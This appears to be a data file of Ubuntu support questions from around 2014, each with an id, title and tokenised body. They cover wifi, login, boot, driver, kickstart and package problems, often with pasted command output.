464938	lost user login on upgrade to ubuntu 13.10	i just upgraded to 13.10 this weekend ( i know 14.04 is out , i 'm not doing that yet ) and have lost my login . there used to be two user accounts i could choose to log in from on the startup page , mine and the dummy one created by a coworker when he was helping me with something . after the upgrade , the only user account i could log in to belongs to my coworker . my account data is still there ( i can access it when i log in as him and cd to /home/username ) but i do n't know how to log in as my old user account . it also does n't show up in the user accounts settings view . how do i add it back ? note : i tried using the answer to this question : why are my user accounts missing from login screen after upgrade to 14.04 from 12.04 ? and got the response `` user 'username ' already exists ''
464939	wifi problem in 14.04	can anyone please help me - i 'm not able to see any wifi enable option in ubuntu 14.04 and i 'm not able find what the problem is ? /i do n't think it depends on laptop any how mine is asus x550cc./ please help me .
464941	how do i disable error reporting to canonical , but keep apport enabled ?	i disabled error reporting in privacy settings , however apport still connects to people.canonical.com and sends crash dumps . it even asks , if i want to include configuration files , which i have edited .
464946	ubuntu gnome - force alt + tab to only switch on current workspace	i just searched for a clean and fast method to force gnome in ubuntu 14.04 to switch only between active apps on the current workspace when pressing the shortcut alt + tab .
464948	set nginx configuration file to different location	i 'm trying to keep all my server code/configuration files in one place . i tried nginx -c /var/www/nginx.conf but received the following error : nginx : [ emerg ] open ( ) `` /var/www/mime.types '' failed ( 2 : no such file or directory ) in /var/www/nginx.conf:8 the file definitely exists but i 'm unsure of what to do . executing ls -al /var/www reveals : total 16 drwx -- -- -- 2 root root 4096 may 12 14:42 ashtonwar.com drwx -- -- -- 2 root root 4096 may 12 14:42 fc.ashtonwar.com drwxrwxr-x 2 root root 4096 may 12 14:42 footballcarbon.com -rw-r -- r -- 1 root root 1675 may 12 14:42 nginx.conf it should be noted i 'm using a digitalocean server/droplet in which the default user has root access . copying /etc/mime.types to /var/www and running nginx -c /var/www/nginx.conf again causes this error : nginx : [ emerg ] unexpected end of file , expecting `` ; '' or `` } '' in /var/www/mime.types:828 executing again with a semi-colon appended to the file end causes this error ( application/activemessage is the first entry ) : nginx : [ emerg ] unknown directive `` application/activemessage '' in /var/www/mime.types:828
464949	is it possible to install ubuntu from a external drive without removable bit	i have a external terrabyte drive and it does not have the removable media bit ( so its seen as a actual hard drive ) . is it possible to make a bootable live ubuntu install on the terrabyte drive or will it only work on flash drives with the removable media bit ?
464951	twitter is missing from the list of online accounts in ubuntu 14.04 - gnome	i am using ubuntu 14.04 lts with gnome shell and from the list of `` add an online account '' , twitter is missing . below is a screenshot : http : //imgur.com/hgi5q07.png any idea why ?
464952	ubuntu touch support for pos machine	i have installed ubuntu 14.04 in my pos ( rio ) . touch is not working . i am looking for solution to enable my touch screen . can anybody help me ?
464953	lubuntu 14.04 wireless not recognised on acer aspire one aoa150	i have been running ubuntu 12.04 with no issues on my acer aspire one . i thought i 'd give 14.04 a try and found that the wireless is not automatically recognised with this release . i 've checked to see if there are any additional drivers available but the list shows 'none available ' . here is the output from lspci : lubuntu @ lubuntu : ~ $ sudo lspci 00:00.0 host bridge : intel corporation mobile 945gse express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gse express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) 03:00.0 ethernet controller : qualcomm atheros ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) 04:00.0 system peripheral : jmicron technology corp. sd/mmc host controller 04:00.2 sd host controller : jmicron technology corp. standard sd host controller 04:00.3 system peripheral : jmicron technology corp. ms host controller 04:00.4 system peripheral : jmicron technology corp. xd host controller
464954	why do i get the following error when trying to install from mounted iso in virtualbox ?	information about my setup : windows 7x64 virtualbox v4.3.10 r93012 daemontools ( latest ) -mounted ubutnu 14.04 server installation iso in daemontools -set daemontools virtual drive `` e : '' with the already mounted ubuntu install image . the boot/installation menu opens . i select install ubuntu server , i go through the keyboard detection process , then when it begins to install at 2 % progress i get the following error : there was a problem reading data from the cd-rom . please make sure it is in the drive . if retrying does not work , you should check the integrity of your cd-rom . failed to copy file from cd-rom . retry ? yes / no
464955	`` the system is running in low graphics mode. `` cant connect to internet !	i just updatet my ubuntu 13.10 and had to reboot but when i did i got a window saying '' the system is running in low graphics mode . your screen , graphics card and input device settings could not be detected correctly . you will need to configure these yourself . '' and i cant use my mouse or mousepad . they just wont work or i just cant see them dont know.. i just saw the bumblebee site but for the configuration i need to connect to the internet and i cant ... . what do i have to do ? the output of the commands : sudo lshw -c display ; lsb_release -a ; uname -a are : *-display description : vga compatible controller product : gf108 [ geforce gt 630m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : d2000000-d2ffffff memory : a0000000-afffffff memory : b0000000- *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33 mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:54 memory : f6400000-f67fffff memory : c0000000-cfffffff ioport:5000 ( size=64 ) no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : caucy linux nunu-w150hrm 3.8.0-35-generic # 50-ubuntu smp tue dec 3 01:24:59 utc 2013 x86_64 x86_64 x86_64 gnu/linux i need some help but please im no expert just a beginner . just be simple with the answers and very thorough . thanks in advance : )
464957	mouse/pen acceleration after a click ( click and drag )	i have a pen shaped mouse ( looks like a pen with the laser and left click in the `` nib '' ) . i would like to use it to `` write '' on some paint-like software ( i am a teacher ) . i have edited the acceleration using : xinput -- set-prop `` genius 2.4g wireless mouse '' `` device accel constant deceleration '' 5 this gives me the `` sensitivity '' i need so that my writing is not gigantic . my problem is not with this sensitivity but with the acceleration time-out just after the click . if i click and drag straight away to begin writing there is a short delay where the cursor speed is incredibly slow before it becomes perfect . if i click and wait a second before dragging the cursor there is no such acceleration and i can write `` normally '' . is there a way i can use xinput to turn off the click and drag acceleration delay ?
464958	new processor woes	my motherboard is an ecs c51gm-m and the processor im trying to upgrade to is an amd athlon 64 x2 dual-core 5000+ 2.6 ghz processor with 1024kb l2 cache and 64-watt socket am2 ( ado5000dswof ) by amd my old processor is the exact same model only its a 3800+ 2.0ghz old processor runs great new processor gives me boot loops and freezing i know about bios updating and honestly ive never done it before the website only supports files for windows xp which i do not have as i switched to ubuntu fully by deleting windows 7 any ways around this i am honestly lost and had no idea where to look on here for something like this
464960	ubuntu touch and device compatibilities	what tablet android devices are even supported ? i have a pantech element ( p4100 )
464961	adobe reader ( acroread ) 64 bit looks bad	i installed acroread on ubuntu 14.04 64-bit with gdebi ( also tried dpkg and via repository `` deb http : //archive.canonical.com/ precise partner '' ) . the result looks bad . for example the open-dialog is out of place , the folder-icons are green and the buttons are not rounded . actually when i start acroread from the command-line , i get several messages and warnings : gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' gtk-warning ** : unable to locate theme engine in module_path : `` murrine '' gtk-message : failed to load module `` canberra-gtk-module '' i remember , that i had this problem , whenever i used a 64bit-ubuntu ( even ubuntu 12.04 ) , but not when i used a 32bit-ubuntu .
464962	how to get ubuntu to open up full sized on vmware player ?	i dunno if this is an ubuntu issue or vmware player . i launch vmware player from win8.1 64 and it appears in windows -but- the initial display of ubuntu seems to be an 800x600 box surrounded by a whole lot of black inside the vmplayer window . ubuntu functions properly . i can get ubuntu to 'fill out ' to the proper full dimensions of vmplayer by hitting the windows minimize button at top right , then re-selecting vmplayer . is there a configure option for ubuntu or vmware that will avoid this 'two-step ' and have ubuntu open at full-size within the vmplayer window ?
464963	trying to add tp-link tg-3468 pcie network card , running into problem	i 've been trying to get my new tp-link tg-3468 to work in my ubuntu server 12.04.04 lts computer for quite some hours now . i noticed that the drivers that came with it were not compatible with my kernel version ( 3.3.5 ( ? ) ) , so i went on a scavanger hunt and found what i think is the right driver . the driver that came with the product is called r8168 , and i found a 2013 release of that . r8168-8.038.00 , to be precise . after installing the driver , which i downloaded from logitech , and rebooting , the ethernet card finally showed up as eth0 . eth1 had been my primary ethernet port up to that point . everything appears to be as notmal : /etc/network/interfaces is set up correctly ( will post exact contents below ) , lshw -c network shows the card as what it is with the correct driver applied , i can ifdown and ifup the interface and i can assign static network configuration to is using the /etc/udev/rules.d/70-persistent-net.rules file . the led on the card also lights up , indicating that it is in 100mbps mode . but , for some reason , the network card refuses to accept a network configuration through dhcp . even when i assign everything manually it just does n't seem to work . i can not ping any other machine in the network . i imagine something is probably wrong , but i can not think of any logical place to start looking . please help me connect to the internet on this pcie network interface . logs and files on pastebin : ) http : //pastebin.com/0vkh5aw5 if you want to see any other config files , please let me know .
464968	14.04 64bit desktop install locks up on time zone screen	i am installing 14.04 along side of 10.10 and after mapper it locks up on the time zone screen . i am running amd64 motherboard with raid 1 and windows 7 . i tried again , and it locked up again . anyone have any ideas ? databyte
464969	what is the difference between 12.04 lts and 14.04 lts	a simple question that should yield a simple answer . all i am wanting to know is what significant differences there are .
464970	synaptics areabottomedge messes up click and drag on asus clickpad	i have an asus n550jv that has a clickpad , where there are n't distinct buttons for right and left clicking . clicking the pad in the bottom left often moves the cursor slightly , so i miss my target by a few pixels , so i set up a `` dead zone '' using synaptics : synclient areabottomedge=1900 ( note that this is specific to my clickpad . use synclient -l to find an appropriate value . ) i now have a dead zone of ~20 % on the bottom of the click pad that 's insensitive to my finger , except for clicking . however , when i click and drag , i never get the appropriate dead zone . instead , i have a couple problems : enlarged dead zone : clicking with one finger in the bottom left and dragging with another finger . the finger that is dragging seems to have a dead-zone that occupies the bottom half of the trackpad , sometimes more , sometimes less . if i left-click using an attached mouse and drag one finger , this does n't happen . disabled dead zone : the dead zone created by areabottomedge is no longer applied - i can drag all the way to the bottom of the touchpad . again , this case occurs unpredictably . my guess is that there 's another synaptics feature that 's interfering , but i could n't figure it out from the man page . here is the output of synclient -l : parameter settings : leftedge = 129 rightedge = 3120 topedge = 120 bottomedge = 2103 fingerlow = 1 fingerhigh = 1 maxtaptime = 180 maxtapmove = 173 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 emulatemidbuttontime = 0 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 78 horizscrolldelta = 78 vertedgescroll = 1 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 1 minspeed = 1 maxspeed = 1.75 accelfactor = 0.050813 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 2 clickfinger1 = 1 clickfinger2 = 3 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 1800 horizhysteresis = 19 verthysteresis = 19 clickpad = 1 rightbuttonarealeft = 1624 rightbuttonarearight = 0 rightbuttonareatop = 1822 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0 related questions : is it possible to manually define the usable space on my laptop 's trackpad ? disable mouse movement in tap zones on synaptics trackpad
464971	ubuntu 14.04 sluggish performance	i have a very recently build gaming rig and i installed ubuntu 14.04 on it because i hated windows 8 . the problems that i am having are weird sluggish performance when dragging windows or selecting items or doing a simple drag and drop operation . the system reacts weirdly to it . for instance if i try to drag an item it will either open the item or deselect it by itself then i have to select it again or keep holding the shift key in order to not deselect it . overall it becomes a hassle to work with this even when i am doing spread sheets in libreoffice if i want to select a table or to copy or select information i have to use the keyboard because with the mouse it does n't work . it will start fine at the beginning but once you start selecting a lot of text it will jump to somewhere else that its not suppose to jump to . another problem that i am having is when i reboot hot corners dont work anymore i have to go back to unity tweak and switch them off then on again . ps : i am using the proprietary graphics and a razer mouse . ( i am thinkin the mouse might be too fast ? )
464973	ubuntu server 12.04 lts kickstart ignores all partitioning commands	we need to use pxe netboot to deploy multiple identical ubuntu 12.04 lts servers . i 've tried various kickstart config files and was always thrown into the installer 's partitioning screen . the automated installation runs ok until its partitioning part and then it stops prompting for manual of guided way . it does not matter if i use standard or alternative server cd 's ( we use amd64 architecture ) - i always got the same results . i 've also tried the same kickstart configs with cd installation and installer acted the same way . have anyone experienced the same installer 's behaviour ? # system language lang en_us # language modules to install langsupport en_us # system keyboard keyboard us # system mouse mouse # system timezone timezone america/vancouver # root password rootpw -- iscrypted $ 1 $ j.nmhx6z $ i2mj1qzqk2bcb58lp3at./ # initial user user sa -- fullname `` system administrator '' -- iscrypted -- password $ 1 $ hphjklns $ fqwfah9e3issxdjmqaef60 # reboot after installation reboot # use text mode install text # install os instead of upgrade install # use web installation url -- url http : //hostname.domain.com/ubuntu # system bootloader configuration bootloader -- location=mbr # clear the master boot record zerombr yes # partition clearing information clearpart -- all -- initlabel # disk partitioning information part /boot -- fstype ext2 -- size 2048 -- asprimary -- ondisk sda part /data -- fstype ext4 -- size 204800 -- asprimary -- ondisk sda part / -- fstype ext4 -- size 51200 -- ondisk sda part /home -- fstype ext4 -- size 51200 -- ondisk sda part /var -- fstype ext4 -- size 102400 -- ondisk sda part swap -- recommended -- asprimary -- ondisk sda # system authorization infomation auth -- useshadow -- enablemd5 # network information network -- bootproto=dhcp -- device=eth0 # firewall configuration firewall -- disabled # do not configure the x window system skipx
464978	how to install latest stable chrome ( 34 ) on ubuntu ?	i 'm running ubuntu 12.04 lts ( 64bit ) and am trying to install the latest version of chrome ( not chromium ) . currently i have chrome 30.0.1599.114 installed . i 'm following the instructions on this page trying : wget https : //dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb sudo dpkg -i google-chrome-stable_current_amd64.deb which works without errors - as does : sudo apt-get install google-chrome-stable but both times i 'm ending up with chrome 30.0.1599.114 and i 'm too ubuntu-novice to do anything about it ... any ideas ?
464979	dual boot windows 8 and ubuntu ( partition not detecting )	i have installed windows 8 and disabled secure boot . when trying to install ubuntu in `` something else '' option of disk partition . it shows only one hard disk with full free space ( 500 gb ) , no windows partition . the windows partition is 300 gb and free space is 200 gb . but during installation whole 500 gb is shown as free space ... please help me . i will really appreciate . thanks
464980	wireless is disabled by hardware switch . wifi does n't work ! ( hard blocked : yes , soft blocked : no , hp pavillion g6 2207tx , ubuntu 12.04 )	i dual installed ubuntu 12.04 alongside windows 8 with dual boot option . wireless disabled by hardware switch . how to turn on the wifi ? i tried following commands . gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 13ba:0017 unknown ps/2 keyboard+mouse adapter bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 003 : id 1bcf:2c1e sunplus innovation technology inc. > gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ lspci > 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) > 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) > 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) > 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) > 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) > 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) > 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) > 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) > 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) > 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) > 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) > 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) > 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) > 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] > 07:00.0 network controller : ralink corp. device 3290 > 07:00.1 bluetooth : ralink corp. device 3298 > 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) > 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5229 ( rev 01 ) > gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ sudo rfkill unblock all > gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ rfkill list all > 0 : phy0 : wireless lan > soft blocked : no > hard blocked : yes wireless card 07:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie
464984	ubuntu 14.04 and shortcuts	i 've upgraded my ubuntu from 12.04 to 14.04 and now have some problems with system shortcuts . it 's in such menus , as launchers ( launch terminal ) , navigation ( switch to another workspace ) , windows ( close window ) . the problem one is that when i restart my computer ( not after every restart , but after a few times ) my shortcuts sets to default ones , so i ca n't change them permanently . also , i 've noticed , that change language shortcut also does n't work normally . so , it may be the problem , somehow connected with system shortcuts at all . i 've read a lot solutions on that topic , but nothing helped . maybe , somebody had the same problem and fixed it ? appreciate your possible help .
464987	how to have more than one compose key ?	currently i 'm using r-ctrl for the compose key . under 12.04 i was able to set a couple keys to work as my compose key and/or to produce special characters ( accents , 単 , etc . ) but i do n't recall how i did it . is there a way to make more than one key work for special characters and how would i set that up ?
464995	force a user to use a specified session	i 've looked everywhere and ca n't find how to do the following : what i have is ubuntu 14.04 desktop 32bit configured with two accounts , one admin and one to run a web kiosk . i have set up a new desktop entry and kiosk script and all is running well . i set up auto login with sudo gedit /etc/lightdm/lightdm.conf autologin-user=kiosk autologin-user-timeout=10 which works fine if you allow it to auto boot , but not only can you choose the user ( which i need ) you can also choose to boot with the kiosk user and change the session to the default ignoring my script . is there a way to force a user to always boot with a particular session , but allow other users to choose ? i do n't want to force the admin account to use the kiosk session .
464997	wifi stoped working after update	my wifi stopped working after i ran an update . i 'm using ubuntu 12.04 lts . the update file has been downloaded but it says the file is corrupted . below is the error message : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 230293 files and directories currently installed . ) preparing to replace linux-firmware 1.79 ( using ... /linux-firmware_1.79.12_all.deb ) ... unpacking replacement linux-firmware ... dpkg : error processing /var/cache/apt/archives/linux-firmware_1.79.12_all.deb ( -- unpack ) : trying to overwrite '/lib/firmware/ar3k/ramps_0x31010000_40.dfu ' , which is also in package bt-dw1705-firmware 0.1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-firmware_1.79.12_all.deb
464999	got hp 255 with ubuntu 12.04 pre installed - how to add dual boot with mint debian ?	i 'm a newbie to linux . i installed mint on an old computer and liked it , i would like to dual boot my hp 255 ubuntu 12.04 laptop with it if possible . as a complete noob when it comes to doing this , i do n't want to break the laptop ! ! how safe is it to just run the mint installer from the livedvd ? thanks stu
465000	seeding with transmission-cli	i am trying to seed a torrent on one of my servers which is cli only . to create the file i am doing : transmission-create a.out then uploading with : transmission-cli -w . a.out.torrent except that it just sits there at 0 percent progress . i 've been trying to use ctorrent as well , but no luck there either . it just spends all of its time trying to connect to a tracker , and really i 'd rather not have any trackers at all anyway . edit : or could someone tell me how to use a free tracker ? or are seeding torrents really impossible and this is all a dream ...
465001	ubuntu 12.04.4 boot problem with windows 8 ( 64-bit )	contrary to other questions here , i do get the option to chose between windows 8 and ubuntu 12.04.4 , but choosing ubuntu i get this weird message about `` more than eight outputs detected '' ... and no boot two out of three times ! i did try boot-repair , but had no luck ! laptop type : dell inspiron 17 3737 , 8gb ram
465003	xubuntu 14.04 , power manager , screensaver	when my computer is inactive , i keep getting a black screen and the screen goes into locked mode asking for a password , even though in power manager i have `` never '' set for actions and monitor and extended `` lock screen '' is unchecked . i do n't see a screensaver , but perhaps that is the issue ? is anyone else experiencing this ? is this a bug ? is there a temporary workaround ? i did not see this issue in 12.xx , 13.xx .
465004	warning message at command line `sudo`	everytime i try to sudo something at the terminal , i get a warning message : alexandre @ xps-15z $ sudo mount file.iso /mnt/ -o loop [ sudo ] password for alexandre : no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory it 's just annoying to get that all the time . how do i solve that ? i 'm on ubuntu 14.04 ( upgraded from 13.10 )
465011	how can i play sound through a cm6501 onboard card ?	i have installed ubuntu 14.04 lts . i have an amd athlon ( tm ) 64 x2 dual core processor 4800+ ă 2 with a cm6501 onboard card . the problem is ubuntu recognizes the card for input but not for output sound . ** list of playback hardware devices ** card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : device [ pnp audio device ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 screenshots : input : http : //i59.tinypic.com/2rww0zm.png output : http : //i62.tinypic.com/xc5eoi.png i would like ubuntu to recognize the cm6501 for output sound , so i can play sound using my desktop speakers .
465012	kernel panic at startup	recently i have installed a second hdd with windows 7 on it . after that , i installed grub on my main disk ( ubuntu ) from a live-usb . however , soon after , when i have tried to load ubuntu ( from grub menu ) , i have recieved a kernel panic with the message like `` unable to mount file system '' . after that , i 've loaded once again from live usb and reinstalled grub . i was doing that by following command sequence : sudo mount -- bind /dev /media/ < disk-id > /dev sudo mount -- bind /proc /media/ < disk-id > /proc sudo mount -- bind /sys /media/ < disk-id > /sys sudo chroot /media/ < disk-id > grub-install /dev/sda update-grub i have got /dev/sda from gparted - there were plenty of clues which hdd is which . those commands have run fine . i got my grub menu , loaded ubuntu , loadewd windows after reboot , and everything was fine - until i made a reboot from windows some time later . then i had the same kernel panic again . how can i correctly diagnose and fix the problem ?
465013	how do i install ubuntu on a computer that has a faulty version of windows xp	how do i install ubuntu on my old desktop which functioned perfectly well till i got problems with windows xp ? at the moment all i can do is open a few of the files i saved to my usb . all my excel and word files on it can not be opened though because my trying to improve xp by reinstalling it using the original cd resulted in all the programs i had including office vanishing . i can not go to any webpages either as essential files are missing . my desktop only has 256 mb of ram . my technical skills are zero unfortunately .
465014	how can i enable edge stop velocity in 14.04 ?	in 12.04 , one of the settings enabled by default was `` edge stop velocity '' , which helped keep the mouse on one screen of a multi-monitor setup unless you pushed a bit harder to get the mouse onto the other screen . this seems to be disabled by default in 14.04 . how can i enable this feature ? i could n't find the setting in the unity tweak tool or the dconf editor .
465015	what is the usage of ~/.freerdp	on the home directory there is a hidden folder named .freerdp . what is that and what is the usage of that ? i see this when i searched for this question and i found freerdp directory on the first answer
465017	ubuntu installer on ext4 partition on sd card	i have an 16 gb sd card , which i 'm using in order to make a triple-boot installer with osx , windows 8.1 and ubuntu 14.4 . i am trying to make it with three partitions , namely hfs , ntfs and ext4 , so that a specific bootloader that i want to use will be able to recognize these partitions naturally as a osx partition , one windows partition and one linux partition . the thing is that , ok , creating an hfs osx installer is easy , making a windows ntfs installer is doable , but i ca n't figure out how the heck i could make an ubuntu installer on an ext4 partition ( fat32 wo n't work because the specific bootloader i want to use does n't recognize fat32 partitions ) . please help ... so to the point : how can i put the ubuntu installer software on an ext4 partition and make it bootable ?
465019	trash media to eject it , like in os x	is there some simple way to make trash treat removable media as os x 's trash does ? ( it treats drag and drop of the media to the trash as eject , actually changing the icon from a trash basket to an eject icon ) by a simple way i guess i mean the way a piece of script is simpler than a piece of c code that would imply recompiling the source , or perhaps there are way easier ways to do this that i just could not find out about . edit : as seth said in his comment , dragging the usb drive to the trash does eject it , it just does n't change the icon ; which i guess is a reason i never thought of trying it . apparently it 's missing in different methods to secure eject removable usb drive ? now that i know the feature works perhaps there is not much of a need , but is there a way to change the icon when i drag a media over the trash to an icon for eject ?
465024	linuxlive usb does not save settings	i am new to linux . i have used/tried all of these utilities : '' linuxlive usb live-usb-install-2.5.2 '' , `` linuxlive usb creator 2.8.28 '' , `` unetbootin-windows-603 '' , `` universal-usb-installer-1.9.5.2 '' to successfully create a 16gb usb that boots linux live . i have used linux mint 16 cinnamon and mate 32 and 64 bit , also ubuntu 14.04 64 bit to be the os . usb was formatted to fat32 . i have used persistence up to 4gb there is a casper-rw file i have edited the append line in syslinux.cfg to have persistence at the end of the line f6 is not an option and boot up does not ever show boot in persistence , always just the try without installing etc . no matter what i do , when i boot my laptop using my live-usb , and then change the settings ( e.g . desktop wallpaper ) and then reboot , the settings go back to default . how do i make the live-usb save the settings ? ( i have successfully installed linux on my usb and that works but then it runs slowly and only works on my laptop and not any other machine . ) i can not think of anything else to do . does anyone have any suggestions ? thanks in advance . 3 days later looks like it must be something to do with my main laptop - can not seem to do anything with it . on the other desktop computer it works fine - goes through and saves to the persistence file ! little needs to be done there except create a user and make it the default to open with , which i have done . i created the usb on the main laptop and even after saving with desktop it still opens without anything allowed to save to persistence . i can only assume it is a limitation within the bios . at least i can use it how i wanted to on the desktop .
465031	network ( hard wire ) works in live session but does n't work after restart , following installation	installed xubuntu on a dell inspiron laptop . worked great in live session . installed and network was still fine . restarted and no longer can connect to network . no clue what changes between live session and installation ? if not an easy fix ... .i have to give mint a try . i should have time to post the results of a few tests if you 'd like ... .not sure where to start . oh ... .forgot to mention , so i removed xubuntu and installed ubuntu ... same results . this is the 14.04 , 64bit
465032	is there a way to downgrade or upgrade samba in trusty ?	logged a bug here : https : //bugs.launchpad.net/ubuntu/+source/samba/+bug/1318840 `` excel mac open files as read-only on samba 4.1.6-ubuntu '' we did n't have this problem in precise . i 'd either like to : downgrade to the precise version of samba upgrade to samba 4.1.7 for option 1 , is there a way to add precise as an apt repo ? will this actually work ? is there a `` samba3 '' it apt for trusty ? for option 2 , is there a ppa that has samba 4.1.7 ? i looked at could n't find one : (
